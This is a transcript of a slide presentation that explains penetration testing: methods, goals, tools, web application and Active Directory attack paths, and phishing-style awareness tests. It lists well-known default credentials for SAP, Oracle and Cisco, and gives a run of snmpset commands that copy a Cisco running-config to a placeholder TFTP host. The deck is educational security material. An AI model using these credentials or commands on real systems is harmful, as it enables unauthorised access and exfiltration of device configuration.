penetration testing, what’s this?
DESCRIPTION
TRANSCRIPT
Penetration testing
What’s this?
Dmitry Evteev (Positive Technologies)
Penetration testing internals
Penetration testing != simulation of (un)real attacker activities
Penetration testing != instrumental scanning with manual vulnerability verification
Penetration testing –
• is a complex of activities aimed to estimate current security process status;
• is a testing of protection bypassing;
• is one of security audit methods.
Methodology
On the one hand, the following best practices are used:
• Open Source Security Testing Methodology Manual (OSSTMM)
• Web Application Security Consortium (WASC)
• Open Web Application Security Project (OWASP)
…
On the other hand, the following standards are used:
• Center of Internet Security (CIS) guides
• ISO 2700x series standards
…
Abilities
Protection mechanism N
… X
Incident managementSome activities were detected but not identified as an attack. 2
Protection mechanism N
… X
Aims
High-level
• Internal policy (pentest as an instrument of pressure)
• Estimation of current security processes
• Should be done (compliance)
Technological
• Get unauthorized access to internal network from the Internet
• Gain maximum privileges in main infrastructure systems (Active Directory, network hardware, DBMS, ERP, etc.)
• Get access to certain information resources
• Get access to certain data (information)
Approaches
Perimeter pentest (with further attacks in internal network)
• With or without administrator awareness
• Wireless network security analysis
Internal pentest
• From average user working station
• From chosen network segment
Certain information system component testing (security analysis)
• Black, Grey and White Box
Assessment of employee awareness in information security
Real attack VS penetration testing
For direct executor pentset is HACKING!
Limitations
• Compliance with Russian Federation legislation
• Limited time
• Minimum impact
• No testing like DDoS
Inconveniences
• Coordination of actions (it can run into a very absurd extreme!)
• Responsibility/Punctuality
Advantages
• Do not need to hide the activities
• Simplify the network perimeter identification process
• A possibility to use Grey and White Box methods
Instruments
Positive Technologies MaxPatrol
Nmap/dnsenum/dig …
…
Immunity Canvas (VulnDisco, Agora Pack, Voip Pack)
Metasploit
…
THC Hydra/THC PPTP bruter/ncrack …
Cain and Abel/Wireshark
Aircrack
…
Yersinia
…
Browser, notepad…
The most frequent web application vulnerabilities detected by “Black Box” method (2009 statistics, http://ptsecurity.ru/analytics.asp)
web application security problem
22%
38%
21%
38%
49%
27%
0% 10% 20% 30% 40% 50% 60%
Bruteforce
Vulnerable server …
Predictable resource …
Information Leakage
SQL Injection
Cross Site Scripting
Pentest example: web applications
What is web application pentest by BlackBox method? (real world)
web server
auditor working station
Check 1
Check N
Vulnerability is detected
Vulnerability 1: password bruteforceImpact: access to application (with limited privileges)
Vulnerability 2: SQL injectionImpact: file reading only (magic quotes option is enabled)
Vulnerability is detected
Vulnerability 3: path traversalImpact: file reading only (potentially LFI)
Vulnerability 4: predictable identifier of loaded fileVulnerability 3 + Vulnerability 4 = Impact: commands execution on server
Next step – FURTHER ATTACK
Weak password problem
The recommended password policy is used
What is domain administrator password?(coincide with login)
Pentest example: Password bruteforce (defaults)
Well known
• admin:123456
• Administrator:P@ssw0rd
…
SAP
• (DIAG) SAP*: 06071992, PASS
mandants: 000, 001, 066, all new
• (RFC) SAPCPIC: ADMIN
mandants :000, 001, 066, all new
…
Oracle
• sys:manager
• sys:change_on_install
…
Cisco
• Cisco:Cisco
…
…
Pentest example: Hello, Pavlik :)
snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1
snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4
snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1
snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host>
snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config
snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1
snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
The problem of access control
Network access
• Network architecture (DMZ, technological network, user segment, testing environment)
• Remote network access
Data access• Shared resources (password in
clear text, data backup copy, different sensitive data)
• Web applications, DBMS, ERP
The problem of access control
Division of privileges among administrators
Users with extended privileges
Services (!) with more than required access level
General problem of identifiers management
Pentest example: Use of vulnerabilities
CANVAS && Metasploit
Pentest example: Privilege Extension in Active Directory
Version 1: Password bruteforce
Version 2: Vulnerabilities in controller domain services
Version 3: Pass-the-hash attack
Version 4: Create new user from domain computer
Version 5: Conduct attack «Poisoning ARP cash» (for example, hijack RDP session, lower authentication level to LM)
Version 6: NTLM Relay attack
Version 7: Find and restore system state domain (for example, after successful attack on backup server)
Version 8: Get extended privileges owing to other systems (for example, control items in company’s root DNS)
Version 9: Get extended privileges via other systems’ vulnerabilities (passwords are stored with reversible encryption, insecure protocols are used, etc.)
Version N …
Pentest example: Security analysis
Servers
Network hardware
Working stattions
Head office
BranchWorking stations
SERVERS
Network hardware
MP SERVER
Auditor working station
WEB SERVER
Password is bruteforced
CHECKS
CHECKS
Internal pentest/Audit using Pentest results
Internal pentest/Audit using Pentest results
Network scanning
Password is bruteforced!• Exploitation of SQL
Injection• Command execution on
server• Privilege gaining• Internal resources attack
Internal pentest• Install MaxPatrol scanner• Find vulnerabilities• Exploit vulnerabilities
Move to network of the Head office
• Conduct attacks on Head office resources
Get maximum privileges in the whole network!
Pentest example: Security analysis
Pentest example: Wireless networks
Pentest example: Assessment of awareness program efficiency
Send provocative messages via e-mail
Send provocative messages via ICQ (and other IM)
Distribute data media with provocative messages
Question employees
Talks (by telephone, skype)
Pentest example: Example of a set of checks
Note description Attack Monitored events
A note from authority with attached executable file.
Spread of network worms.
System infection with Trojan horse.
Open the mailbox.
Execute the attached file.
A note from internal person with link to web site. The link points to an executable file.
Fishing attacks.
Spread of network worms.
System infection with Trojan horse.
Attacks through software vulnerabilities.
Open the mailbox.
Load file from web server.
Execute the file.
A note from authority with link to web site.
Fishing attacks.
Spread of network worms.
System infection with Trojan horse.
Attacks through software vulnerabilities.
Open the mailbox.
Follow the link.
Pentest example: Assessment of awareness program effeciency
Users that follow the link (only 1 pentest) Users that follow the link (regular pentest)
Conclusions
Penetration testing
– is a number of activities that allows to make efficient assessment of current security processes
Penetration testing
– is search and use of flows in security processes
• vulnerability management
• configuration management
• incident management
• security management of web applications, DBMS, ERP, wire and wireless networks, etc.
• etc.
